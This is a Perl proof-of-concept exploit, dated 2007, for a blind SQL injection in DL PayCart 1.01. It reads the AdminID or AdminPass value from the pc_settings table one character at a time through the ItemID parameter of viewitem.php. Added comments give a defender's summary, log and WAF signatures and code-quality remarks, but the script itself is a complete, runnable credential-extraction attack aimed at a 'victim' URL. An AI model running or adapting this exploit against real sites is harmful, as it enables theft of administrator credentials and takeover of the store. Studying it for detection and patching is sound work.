Posted on 29 August 2007
#!/usr/bin/perl -w
# Proof-of-concept for a boolean-based blind SQL injection in DL PayCart 1.01.
# It reads one column of the pc_settings table (AdminID or AdminPass) a
# character at a time through the ItemID parameter of viewitem.php.
#
# Defender's summary (everything below is visible in the code itself):
#   * Injection point: the ItemID query-string parameter of /viewitem.php,
#     sent as a numeric value followed by a single quote and SQL. Casting
#     ItemID to an integer or using a parameterised query removes the flaw.
#   * Payload shape: spaces are replaced by /**/, the comparison is
#     substring((select ... limit 0,1), <pos>, 1)=char(<code>), and the
#     rest of the query is commented out with a trailing /*. A request-log
#     or WAF rule on "substring((select" or "/**/and/**/" in the query
#     string matches this exact payload.
#   * Volume: the main loop issues up to 224 requests (char codes 32..255)
#     for each of 32 positions, all to the same path, from one User-Agent
#     string - a burst that is easy to spot in access logs.
#   * Oracle: the response is treated as "true" when it does NOT contain
#     the string noimage.gif (see sub blind below).
#
# NOTE: the script runs with -w but without `use strict`; every variable
# apart from the four lexicals in blind() is a package global.
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts : DL PayCart 1.01 - (c) 2006
# Discovered By : irvian
# scripts site : http://www.dinkumsoft.com/
# Thanks To
# bot : sqlscan, hantu_internet, xcart
# chanell : #hitamputih #nyubicrew #patihack and my private channel noscan
# Friend : nyubi, ibnusina, arioo, jipank,ifx and all my friend
#---------------------------------------------------------------------------------
# Usage: two positional arguments - the base URL and an option selecting the
# column to read (1 = AdminID, 2 = AdminPass).
if (@ARGV < 2){ die " use : $0 host option example : $0 http://victim.com 1 1= AdminID 2= AdminPass ";}
$url = $ARGV[0];
$option = $ARGV[1];
print " [+]-----------------------------------------[+] ";
print "[+]Blind SQL injection [+] ";
print "[+]DL PayCart 1.01 - (c) 2006 [+] ";
print "[+]code by irvian [+] ";
print "[+]special To : ifx, arioo, jipank [+] ";
print "[+]-----------------------------------------[+] ";
# Label for the column being read; the third syswrite argument is the byte
# length of the label so the whole string is written.
if ($option eq 1){ syswrite(STDOUT, "AdminID: ", 9);}
elsif ($option eq 2){ syswrite(STDOUT, "AdminPass: ", 11);}
# Outer loop: character positions 1..32 of the selected column. The fixed
# upper bound of 32 is an assumption about the stored value's length
# (32 matches a hex MD5 digest, but the script does not check this).
for($i = 1; $i <= 32; $i++){
    $f = 0;           # set to 1 once a character code matched at position $i
    $n = 32;          # candidate character code, tried in order from 32 to 255
    # Inner loop: one HTTP request per candidate code until blind() reports a
    # match or the range is exhausted. Positions with no match print nothing.
    while(!$f && $n <= 255) {
        # &-style call with a trailing comma; avoid this form in new code.
        if(&blind($url, $option, $i, $n,)){
            $f = 1;
            syswrite(STDOUT, chr($n), 1);
        }
        $n++;
    }
}
print " [+]finish Execution Exploit ";

# blind($site, $op, $az, $na)
#   $site - base URL of the target
#   $op   - 1 for AdminID, 2 for AdminPass (any other value leaves $klm unset,
#           or stale from the previous call, since it is a package global)
#   $az   - 1-based character position passed to substring()
#   $na   - candidate character code passed to char()
# Returns 1 when the fetched page does not contain "noimage.gif" (case
# insensitive), otherwise returns an empty value (falls off the end of the
# sub). Note that any response without that marker - including an HTTP error
# page, since the status code is never checked - is reported as a match.
sub blind {
    my $site = $_[0];
    my $op = $_[1];
    my $az = $_[2];
    my $na = $_[3];
    if ($op eq 1){$klm = "AdminID";}
    elsif ($op eq 2){$klm = "AdminPass";}
    # Full injected URL: ItemID=1 followed by a quote, the boolean condition
    # with /**/ in place of spaces, and a trailing /* to comment out the
    # remainder of the application's query.
    $blind = "$site"."/viewitem.php?ItemID=1'/**/and/**/substring((select/**/"."$klm"."/**/from/**/pc_settings/**/limit/**/0,1),"."$az".",1)=char("."$na".")/*";
    # A new UserAgent object is created for every request (no connection reuse);
    # the User-Agent header is a fixed Internet Explorer 7 / XP string.
    $b = LWP::UserAgent->new() or die "Could not initialize browser ";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    $req = $b->request(HTTP::Request->new(GET=>$blind));
    $res = $req->content;
    # Boolean oracle: presumably the application shows noimage.gif when the
    # injected condition is false and the item is not found - not verifiable
    # from this script alone.
    if ($res !~ /noimage.gif/i){ return 1; }
}